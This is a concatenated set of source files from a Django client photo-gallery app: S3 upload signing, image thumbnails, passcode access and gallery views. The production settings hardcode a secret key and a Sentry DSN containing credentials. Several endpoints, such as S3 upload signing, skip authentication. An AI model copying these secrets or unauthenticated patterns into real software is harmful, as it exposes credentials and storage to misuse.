http://stackoverflow.com/questions/5254021/python-human-sort-of-numbers-with-alpha-numeric-but-in-pyqt-and-a-lt-oper/5254534#5254534
'''
parts = re.split('(\d*\.\d+|\d+)', key)
return tuple((e.swapcase() if i % 2 == 0 else float(e)) for i, e in enumerate(parts))
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,182 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/urls.py | from django.conf.urls import patterns, url
# URL routes for the galleries app: gallery CRUD and client pages, plus
# AJAX endpoints for image upload/selection.
urlpatterns = patterns('',
    # Galleries
    url(r'^create-gallery/', 'apps.galleries.views.create_gallery', name='create_gallery'),
    url(r'^edit-gallery/(?P<pk>\d+)', 'apps.galleries.views.edit_gallery', name='edit_gallery'),
    url(r'^delete-gallery/', 'apps.galleries.views.delete_gallery', name='delete_gallery'),
    url(r'^galleries/', 'apps.galleries.views.galleries', name='galleries'),
    # version is 'd' (desktop) or 'm' (mobile); passcode identifies the gallery.
    url(r'^gallery/(?P<version>.*\w)/(?P<passcode>.*\w)', 'apps.galleries.views.gallery_detail', name='gallery_detail'),
    url(r'^send-completed-gallery/(?P<pk>\d+)', 'apps.galleries.views.send_completed_gallery', name='send_completed_gallery'),
    url(r'^gallery-completed-thanks/', 'apps.galleries.views.gallery_completed_thanks', name='gallery_completed_thanks'),
    url(r'^client-access/', 'apps.galleries.views.client_access', name='client_access'),
    # Gallery Images
    url(r'^create-gallery-image/', 'apps.galleries.views.create_gallery_image', name='create_gallery_image'),
    url(r'^s3-sign-upload/', 'apps.galleries.views.s3_sign_upload', name='s3_sign_upload'),
    url(r'^toggle-select-gallery-image/', 'apps.galleries.views.toggle_select_gallery_image', name='toggle_select_gallery_image'),
)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,183 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/models.py | from __future__ import division
import os
import re
import urllib
from django.db.models.signals import post_save, pre_delete
from django.db import models
from PIL import Image
from sorl.thumbnail import get_thumbnail
import tasks
class Gallery(models.Model):
    """A client photo gallery, accessed by passcode, with an image quota."""
    name = models.CharField(max_length=60)
    # Code the client types on the client-access page.
    passcode = models.CharField(max_length=60)
    # Number of images included in the client's package.
    number_of_images = models.PositiveIntegerField()
    # NOTE(review): the default is a float (20.00) on an integer field —
    # confirm whole currency units are intended.
    cost_per_extra_image = models.PositiveIntegerField(default=20.00)

    def __unicode__(self):
        return self.name

    @property
    def selected_image_count(self):
        # How many images the client has marked as selected.
        return self.galleryimage_set.filter(is_selected=True).count()

    @property
    def total_image_count(self):
        # Total number of images uploaded to this gallery.
        return self.galleryimage_set.count()

    def get_desktop_url(self):
        # Desktop ('d') client view URL for this gallery.
        return "/gallery/%s/%s" % ('d', self.passcode)

    def get_mobile_url(self):
        # Mobile ('m') client view URL for this gallery.
        return "/gallery/%s/%s" % ('m', self.passcode)

    def get_s3_directory_name(self):
        # S3 key prefix for this gallery's uploads, e.g. "42/".
        return '%s/' % self.pk
class GalleryImage(models.Model):
    """A single photo in a Gallery, stored on S3, with cached dimensions."""
    # S3 URL of the original upload.
    full_size_url = models.URLField(max_length=200, null=True)
    gallery = models.ForeignKey('Gallery')
    # Pixel height, filled in by set_dimensions().
    height = models.PositiveIntegerField(null=True)
    # NOTE(review): BooleanField without an explicit default — confirm this
    # is intended on this Django version.
    is_portrait = models.BooleanField()
    # True once the client has picked this image.
    is_selected = models.BooleanField(default=False)
    name = models.CharField(max_length=100, null=True)
    # S3 object key, derived from full_size_url by set_s3_object_name().
    s3_object_name = models.CharField(max_length=200)
    # Pixel width, filled in by set_dimensions().
    width = models.PositiveIntegerField(null=True)

    def __unicode__(self):
        return self.full_size_url

    @property
    def _thumbnail_size(self):
        """
        The maximum thumbnail dimension. Used for generating thumbnails.
        """
        return 720

    @property
    def _template_thumbnail_size(self):
        """
        This is used to calculate the size of the template_thumbnail_<width/height>.
        We use _thumbsize_size / 2 so the template renders the images at 2x.
        """
        return self._thumbnail_size / 2

    @property
    def template_thumbnail_width(self):
        """
        The width in pixels that the thumbnail should be rendered in the template.
        Accounts for portrait/landscape, maintains aspect ratio, and does not exceed _template_thumbnail_size.
        """
        # Width the image would have if scaled so its height hit the cap.
        max_thumb_width = self.width * (self._template_thumbnail_size / self.height)
        if self.is_portrait:
            if self.width >= self._template_thumbnail_size:
                return self._template_thumbnail_size
            else:
                return self.width
        else:
            if self.width < max_thumb_width:
                return self.width
            else:
                return max_thumb_width

    @property
    def template_thumbnail_height(self):
        """
        The height in pixels that the thumbnail should be rendered in the template.
        Accounts for portrait/landscape, maintains aspect ratio, and does not exceed _template_thumbnail_size.
        """
        # Height the image would have if scaled so its width hit the cap.
        max_thumb_height = self.height * (self._template_thumbnail_size / self.width)
        if self.is_portrait:
            if self.height < max_thumb_height:
                return self.height
            else:
                return max_thumb_height
        else:
            if self.height >= self._template_thumbnail_size:
                return self._template_thumbnail_size
            else:
                return self.height

    def _get_thumbnail(self, width, height):
        """
        Wrapper for sorl thumbnail's get_thumbnail. Used for creating various image thumbnails.
        Returns a thumbnail url without arguments, such as an S3 Signature.
        """
        dimensions = '%sx%s' % (width, height)
        thumb = get_thumbnail(self.full_size_url, dimensions, quality=85, crop='noop', upscale=False, padding=True)
        # Strip the query string (e.g. the S3 signature) from the URL.
        url_no_args = re.sub(r'\?.*', '', thumb.url)
        return url_no_args

    #def fullscreen(self):
        #return self._get_thumbnail(1200, 1200)

    def generate_thumbnails(self):
        """
        Generates image thumbnails
        """
        self.thumbnail()
        #self.fullscreen()

    def process(self):
        """
        Sets image dimensions, s3_object_name, and generates thumbnails in one run
        """
        self.set_dimensions()
        self.set_s3_object_name()
        self.generate_thumbnails()

    def set_dimensions(self):
        """
        Sets image width, height, and is_portrait
        """
        # NOTE(review): urllib.urlretrieve is the Python 2 API; this
        # downloads the file to the working directory, reads its size with
        # PIL, then deletes the temp copy.
        urllib.urlretrieve(self.full_size_url, filename=self.name)
        image_file = Image.open(self.name)
        width = image_file.size[0]
        height = image_file.size[1]
        is_portrait = image_file.size[0] < image_file.size[1]
        os.remove('%s' % self.name)
        self.width = width
        self.height = height
        self.is_portrait = is_portrait
        self.save()

    def set_s3_object_name(self):
        """
        Sets s3_object_name
        """
        # Drop the "http...com/" host prefix, leaving only the S3 key.
        self.s3_object_name = re.sub(r'http.*com\/', '', '%s' % self.full_size_url)
        self.save()

    def thumbnail(self):
        """
        Returns the thumbnail for the image.
        """
        return self._get_thumbnail(self._thumbnail_size, self._thumbnail_size)
def process_gallery_image(sender, **kwargs):
    """post_save hook: run full processing on newly created gallery images."""
    if not kwargs['created']:
        return
    kwargs['instance'].process()
def delete_gallery_images(sender, **kwargs):
    """pre_delete hook: queue asynchronous removal of a gallery's S3 images."""
    doomed_gallery = kwargs['instance']
    tasks.delete_gallery_images.delay(doomed_gallery.pk)
# Wire up the model signals: clean up S3 images before a gallery is
# deleted, and process newly uploaded images after they are saved.
pre_delete.connect(delete_gallery_images, sender=Gallery)
post_save.connect(process_gallery_image, sender=GalleryImage)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,184 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/views.py | from __future__ import division
import base64
import hmac
import json
import hashlib
import time
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.core.mail import mail_managers
from django.template.loader import render_to_string
from apps.galleries.models import Gallery, GalleryImage
from apps.galleries.forms import GalleryForm, GalleryImageForm, ClientAccessForm
from apps.sparrow_bleu.utils import _human_key
from django.conf import settings
from sorl.thumbnail import get_thumbnail
from endless_pagination.decorators import page_template
def client_access(request):
    """Client passcode entry page.

    POST looks up the gallery for the submitted passcode and redirects to
    its mobile ('m') or desktop ('d') view; an unknown passcode re-renders
    the page with an error flag. GET simply renders the page.
    """
    if request.method == 'POST':
        form = ClientAccessForm(request.POST or None)
        if form.is_valid():
            passcode = form.cleaned_data['passcode']
            is_mobile = form.cleaned_data['is_mobile']
            if is_mobile:
                version = 'm'
            else:
                version = 'd'
            try:
                # Existence check only — the unused local binding was removed;
                # the redirect URL is rebuilt from the submitted passcode.
                Gallery.objects.get(passcode=passcode)
                return redirect('/gallery/%s/%s' % (version, passcode))
            except Gallery.DoesNotExist:
                return render(request, 'client_access.html', {
                    'gallery_does_not_exist': True,
                    'passcode': passcode
                })
    # NOTE(review): on GET no 'form' is defined, so locals() passes no form
    # to the template — confirm the template builds its own inputs.
    return render(request, 'client_access.html', locals())
def galleries(request):
    """Staff listing of all galleries with a preview thumbnail and the
    extra-image cost owed by each client."""
    if not request.user.is_authenticated():
        return redirect('/client-access')
    rows = []
    for gallery in Gallery.objects.all().order_by('name'):
        # First image (if any) becomes the 250x250 preview thumbnail.
        images = GalleryImage.objects.all().filter(gallery=gallery)
        if images.count() > 0:
            thumb = get_thumbnail(images[0].full_size_url, '250x250', quality=90, crop='center')
            preview_image_url = thumb.url
        else:
            preview_image_url = None
        # Charge only for selections beyond the included quota.
        extra = gallery.selected_image_count - gallery.number_of_images
        total_cost = extra * gallery.cost_per_extra_image if extra > 0 else 0
        rows.append([gallery, preview_image_url, total_cost])
    return render(request, 'galleries.html', {'galleries': rows})
def create_gallery(request):
    """Staff page to create a new gallery.

    Rejects a passcode that is already in use by another gallery; on
    success redirects straight to the new gallery's desktop view.
    """
    if not request.user.is_authenticated():
        return redirect('/')
    if request.method == 'POST':
        form = GalleryForm(request.POST or None)
        errors = []
        if form.is_valid():
            name = form.cleaned_data['name']
            passcode = form.cleaned_data['passcode']
            number_of_images = form.cleaned_data['number_of_images']
            cost_per_extra_image = form.cleaned_data['cost_per_extra_image']
            # Passcodes must be unique: they are the client's only login.
            try:
                gallery = Gallery.objects.get(passcode=passcode)
                errors.append('Gallery "%s" already has passcode "%s".' % (gallery, passcode))
                return render(request, 'create_edit_gallery.html', {'form': form, 'errors': errors})
            except Gallery.DoesNotExist:
                gallery = Gallery(name=name, passcode=passcode, number_of_images=number_of_images, cost_per_extra_image=cost_per_extra_image)
                gallery.save()
                return redirect('/gallery/%s/%s' % ('d', passcode))
        return render(request, 'create_edit_gallery.html', {'form': form, 'errors': errors})
    form = GalleryForm()
    return render(request, 'create_edit_gallery.html', {'form': form})
def edit_gallery(request, pk):
    """Staff page to edit an existing gallery.

    GET pre-fills a hand-built form dict from the gallery; POST validates,
    rejects a passcode already used by a *different* gallery, saves, and
    redirects to the galleries listing.
    """
    if not request.user.is_authenticated():
        return redirect('/')
    if request.method == 'GET':
        try:
            gallery = Gallery.objects.get(pk=pk)
            # Hand-built dict mirroring the template's form field interface.
            form = {
                'name': {
                    'value': gallery.name,
                },
                'passcode': {
                    'value': gallery.passcode,
                },
                'number_of_images': {
                    'value': gallery.number_of_images,
                },
                'cost_per_extra_image': {
                    'value': gallery.cost_per_extra_image,
                },
            }
            return render(request, 'create_edit_gallery.html', {'gallery': gallery, 'form': form, 'editing': True})
        except Gallery.DoesNotExist:
            errors = []
            errors.append('Gallery ID %s could not be found' % pk)
            return render(request, 'create_edit_gallery.html', {'errors': errors})
    if request.method == 'POST':
        form = GalleryForm(request.POST or None)
        errors = []
        try:
            gallery = Gallery.objects.get(pk=pk)
            if form.is_valid():
                name = form.cleaned_data['name']
                passcode = form.cleaned_data['passcode']
                number_of_images = form.cleaned_data['number_of_images']
                cost_per_extra_image = form.cleaned_data['cost_per_extra_image']
                # make sure there isn't a different gallery with the edited passcode
                try:
                    duplicate = Gallery.objects.get(passcode=passcode)
                    if duplicate.pk != gallery.pk:
                        # Re-render with an inline error on the passcode field.
                        form = {
                            'name': {
                                'value': gallery.name,
                            },
                            'passcode': {
                                'value': duplicate.passcode,
                                'errors': ['%s\'s passcode is already "%s"' % (duplicate.name, duplicate.passcode)]
                            },
                            'number_of_images': {
                                'value': gallery.number_of_images,
                            },
                            'cost_per_extra_image': {
                                'value': gallery.cost_per_extra_image,
                            },
                        }
                        return render(request, 'create_edit_gallery.html', {'gallery': gallery, 'form': form, 'editing': True})
                except Gallery.DoesNotExist:
                    # No gallery holds this passcode yet: safe to use it.
                    pass
                gallery.name = name
                gallery.passcode = passcode
                gallery.number_of_images = number_of_images
                gallery.cost_per_extra_image = cost_per_extra_image
                gallery.save()
                return redirect('/galleries/')
            return render(request, 'create_edit_gallery.html', {'gallery': gallery, 'form': form, 'editing': True})
        except Gallery.DoesNotExist:
            errors.append("Sorry, couldn't find a Gallery with id %s." % pk)
            return render(request, 'create_edit_gallery.html', {'form': form, 'errors': errors, 'editing': True})
def delete_gallery(request):
    """AJAX endpoint: delete a gallery identified by 'gallery_pk' (POST only)."""
    if not request.user.is_authenticated():
        return redirect('/galleries/')
    # Guard clause: anything but an AJAX POST is rejected outright.
    if not (request.is_ajax() and request.method == 'POST'):
        return HttpResponse(content="delete_gallery only accepts POST requests. You sent %s." % request.method, content_type=None, status=400)
    gallery_pk = request.POST.get('gallery_pk')
    try:
        Gallery.objects.get(pk=gallery_pk).delete()
    except Gallery.DoesNotExist:
        return HttpResponse(content="Sorry, this gallery doesn't exist.", content_type=None, status=400)
    return HttpResponse(content="Gallery deleted successfully", content_type=None, status=200)
@page_template('gallery_detail_page.html')
def gallery_detail(request, version, passcode=None, template='gallery_detail.html', extra_context=None):
    """Client-facing gallery page (endless-pagination view).

    :param version: 'm' for mobile or 'd' for desktop rendering.
    :param passcode: gallery passcode from the URL.
    The decorator swaps *template* for the page template on AJAX
    pagination requests and supplies *extra_context*.
    """
    if version and passcode:
        try:
            gallery = Gallery.objects.get(passcode=passcode)
            gallery_image_qs = GalleryImage.objects.filter(gallery=gallery.pk)
            # Natural sort so "img2" comes before "img10".
            naturally_sorted_qs = sorted(gallery_image_qs, key=lambda img: _human_key(img.name))
            gallery_images = []
            for image in naturally_sorted_qs:
                # Flatten each image into the dict shape the template expects.
                gallery_images.append({
                    'pk': image.pk,
                    'name': image.name,
                    'width': image.width,
                    'height': image.height,
                    'thumbnail': image.thumbnail,
                    #'fullscreen': image.fullscreen,
                    'thumb_width': image.template_thumbnail_width,
                    'thumb_height': image.template_thumbnail_height,
                    'is_selected': image.is_selected
                })
            is_mobile = version == 'm'
            is_desktop = version == 'd'
            context = {
                'gallery': gallery,
                'gallery_images': gallery_images,
                'is_mobile': is_mobile,
                'is_desktop': is_desktop
            }
            if extra_context is not None:
                context.update(extra_context)
            return render(request, template, context)
        except Gallery.DoesNotExist:
            return redirect('/galleries/')
    else:
        return redirect('/galleries/')
def send_completed_gallery(request, pk=None):
    """Email the site managers the client's final image selection.

    Counts how many selected images exceed the gallery's included number
    and the resulting extra cost, renders text + HTML email bodies, sends
    them via mail_managers, then redirects to the thank-you page.
    """
    if pk:
        try:
            gallery = Gallery.objects.get(pk=pk)
            cost_per_extra_image = gallery.cost_per_extra_image
            number_of_images = gallery.number_of_images
            images = GalleryImage.objects.all().filter(gallery=gallery, is_selected=True)
            # Natural sort so numbered filenames appear in order in the email.
            sorted_images = sorted(images, key=lambda img: _human_key(img.name))
            selected_image_count = images.count()
            if selected_image_count > number_of_images:
                extra_images = selected_image_count - number_of_images
                extra_cost = cost_per_extra_image * (selected_image_count - gallery.number_of_images)
            else:
                extra_images = 0
                extra_cost = 0
            context = {
                'gallery': gallery,
                'images': sorted_images,
                'cost_per_extra_image': cost_per_extra_image,
                'extra_images': extra_images,
                'extra_cost': extra_cost
            }
            subject = 'Gallery Complete: %s' % gallery.name
            html_body = render_to_string('send_completed_gallery_email.html', context)
            text_body = render_to_string('send_completed_gallery_email.txt', context)
            mail_managers(subject, text_body, html_message=html_body)
            return redirect('/gallery-completed-thanks/')
        except Gallery.DoesNotExist:
            return HttpResponse(content="Gallery with pk '%s' does not exist!" % pk, status=400)
    else:
        return redirect('/galleries/')
def gallery_completed_thanks(request):
    """Render the static thank-you page shown after a gallery is submitted."""
    template_name = 'gallery_completed_thanks.html'
    return render(request, template_name)
def create_gallery_image(request):
    """Register a GalleryImage record for a file already uploaded to S3.

    Expects POST data: gallery (pk), full_size_url, name, s3_object_name.
    Returns the new image's pk with status 200, or the form errors with
    status 400.  Non-POST requests fall through and return None.
    """
    if request.method == "POST":
        form = GalleryImageForm(request.POST)
        # NOTE(review): this lookup runs before form validation, so an
        # unknown gallery pk raises instead of producing a 400 — confirm
        # callers always send a valid pk.
        gallery = Gallery.objects.get(pk=request.POST['gallery'])
        full_size_url = request.POST['full_size_url']
        name = request.POST['name']
        s3_object_name = request.POST['s3_object_name']
        if form.is_valid():
            new_image = GalleryImage.objects.create(full_size_url=full_size_url, gallery=gallery, name=name,
                                                    s3_object_name=s3_object_name)
            # NOTE(review): objects.create() already persists the row; this
            # second save() looks redundant.
            new_image.save()
            return HttpResponse(content=new_image.pk, content_type=None, status=200)
        else:
            return HttpResponse(content="The request form is invalid:\n\n" + str(form.errors), content_type=None, status=400)
def s3_sign_upload(request):
    """Return a signed S3 PUT URL so the browser can upload directly.

    Implements AWS signature v2: HMAC-SHA1 over the canonical PUT request,
    base64-encoded and URL-escaped.  NOTE(review): base64.encodestring and
    hmac.new with a str key are Python-2-era APIs — this view will not run
    unmodified on Python 3.
    """
    object_name = request.GET.get('s3_object_name')
    mime_type = request.GET.get('s3_object_type')
    expires = int(time.time() + 3600)  # signed URL valid for one hour
    amz_headers = "x-amz-acl:public-read"  # uploaded object becomes world-readable
    put_request = "PUT\n\n%s\n%d\n%s\n/%s/%s" % (mime_type, expires, amz_headers, settings.AWS_STORAGE_BUCKET_NAME, object_name)
    signature = base64.encodestring(hmac.new(settings.AWS_SECRET_ACCESS_KEY, put_request, hashlib.sha1).digest())
    # Escape characters that are not URL-safe in the query string.
    signature = signature.replace(' ', '%20').replace('+', '%2B')
    url = 'https://%s.s3.amazonaws.com/%s' % (settings.AWS_STORAGE_BUCKET_NAME, object_name)
    data = json.dumps({
        'signed_request': '%s?AWSAccessKeyId=%s&Expires=%d&Signature=%s' % (
            url, settings.AWS_ACCESS_KEY_ID, expires, signature),
        'url': url
    })
    # NOTE(review): HttpResponse(mimetype=...) is the pre-Django-1.7 keyword;
    # newer Django requires content_type= instead.
    return HttpResponse(data, mimetype='application/json')
def toggle_select_gallery_image(request):
    """Flip the is_selected flag on one GalleryImage (AJAX POST only).

    Returns the new is_selected value with status 200, or a 400 when the
    image does not exist.  Non-AJAX / non-POST requests fall through and
    return None, matching the original behaviour.
    """
    if request.is_ajax() and request.method == 'POST':
        image_pk = request.POST.get('image_pk')
        try:
            image = GalleryImage.objects.get(pk=image_pk)
        except GalleryImage.DoesNotExist:
            # Bug fix: message previously read "Could find image."
            return HttpResponse(content="Could not find image.", content_type=None, status=400)
        image.is_selected = not image.is_selected
        image.save()
        return HttpResponse(content=image.is_selected, content_type=None, status=200)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,185 | levithomason/sparrowbleu | refs/heads/master | /settings/production.py | # grab default settings, then override as necessary for production
from default import *
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
DEBUG = False
TEMPLATE_DEBUG = False
# Parse database configuration from $DATABASE_URL
import dj_database_url
DATABASES['default'] = dj_database_url.config()
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'dyelf3m-y9*&0@4the0b@70qy93dy$k#n#-2&or5d(l1a0&6bl'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'apps.sparrow_bleu.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = os.path.join(PROJECT_PATH, 'wsgi.application')
INSTALLED_APPS += (
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# Set your DSN value
RAVEN_CONFIG = {
'dsn': 'https://c4bf3fe7a4e64448a062c04a603e7450:de418b2411944472a3c6695270622d41@app.getsentry.com/13905',
}
INTERNAL_IPS = ('',)
# Email
EMAIL_BACKEND = 'postmark.django_backend.EmailBackend'
# Celery
BROKER_URL = os.environ['RABBITMQ_BIGWIG_RX_URL']
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,186 | levithomason/sparrowbleu | refs/heads/master | /apps/user/forms.py | from django import forms
from apps.galleries.models import Gallery
class loginForm(forms.Form):
    """Username/password form used to log a user in."""
    username = forms.CharField(max_length=60)
    password = forms.CharField(max_length=60)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,187 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/test_cases.py | from django.test import LiveServerTestCase
from nose.plugins.attrib import attr
from selenium.webdriver.firefox.webdriver import WebDriver
@attr(e2e=True)  # lets nose include/exclude browser tests, e.g. nosetests -a e2e
class E2ETestCase(LiveServerTestCase):
    """Base class for Selenium end-to-end tests against Django's live server.

    Starts one Firefox WebDriver per test class and quits it once all
    tests in the class have run.
    """

    @classmethod
    def setUpClass(cls):
        cls.driver = WebDriver()
        # Implicitly wait means if we don't find an element automatically keep
        # looking for 10 seconds
        cls.driver.implicitly_wait(10)
        super(E2ETestCase, cls).setUpClass()

    @classmethod
    def tearDownClass(cls):
        super(E2ETestCase, cls).tearDownClass()
        cls.driver.quit()

    def get_remote(self, url):
        """Navigate the browser to an absolute URL."""
        self.driver.get(url)

    def get_local(self, url):
        '''
        Automatically puts WebDriver url in front
        Example:
            self.get_local(reverse('home'))
        '''
        self.driver.get("%s%s" % (self.live_server_url, url))
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,188 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/forms.py | from django import forms
from apps.galleries.models import Gallery
class GalleryForm(forms.Form):
    """Fields for creating or editing a Gallery."""
    name = forms.CharField(max_length=60)
    passcode = forms.CharField(max_length=60)  # client-facing access code
    number_of_images = forms.IntegerField(min_value=0)  # images included in the package
    cost_per_extra_image = forms.IntegerField(min_value=0)
class GalleryImageForm(forms.Form):
    """Validates the POST data for registering an S3-uploaded image."""
    gallery = forms.ModelChoiceField(Gallery.objects.all())
    full_size_url = forms.URLField(max_length=200)
    name = forms.CharField(max_length=100)
    s3_object_name = forms.CharField(max_length=200)
class ClientAccessForm(forms.Form):
    """Passcode entry form clients use to open their gallery."""
    passcode = forms.CharField(max_length=60)
    is_mobile = forms.BooleanField(required=False)  # unchecked checkbox submits as False
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,189 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/tests/test_basic.py | from django.core.urlresolvers import reverse
from sparrow_bleu.test_cases import E2ETestCase
class BasicTest(E2ETestCase):
    """Smoke test: home redirects to client access and shows the brand logo."""

    def test_index(self):
        self.get_local(reverse('home'))
        self.assertIn('client-access', self.driver.current_url)
        brand_logo = self.driver.find_element_by_id('brand_sparrow_bleu')
        self.assertTrue(brand_logo)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,190 | levithomason/sparrowbleu | refs/heads/master | /apps/galleries/tasks.py | from __future__ import absolute_import
from celery import shared_task
# TODO: figure out why using 'from django.conf import settings' here throws boto_bucket not found
from settings import *
from django.core import management
@shared_task(name="delete_gallery_images")
def delete_gallery_images(gallery_pk):
    """Celery task: remove a gallery's objects from S3, then purge thumbnails.

    S3 keys are prefixed with the gallery pk, so listing by that prefix
    covers all of the gallery's uploads.  ``boto_bucket`` comes from the
    star-import of settings above.
    """
    key_prefix = "%s" % gallery_pk
    for key in boto_bucket.list(prefix=key_prefix):
        key.delete()
    # Presumably the thumbnail library's cleanup command, dropping cached
    # thumbnails whose source images are now gone — confirm which backend.
    management.call_command('thumbnail', 'cleanup')
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,191 | levithomason/sparrowbleu | refs/heads/master | /apps/user/urls.py | from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
url(r'^user_login', 'apps.user.views.user_login', name='user_login'),
url(r'^user_logout', 'apps.user.views.user_logout', name='user_logout'),
) | {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,201 | wegotas/euler_problem_54 | refs/heads/master | /main.py | from classes import *
# Project Euler problem 54: count how many poker hands each player wins.
round_playment = RoundPlayment()
with open("poker.txt") as input_data:
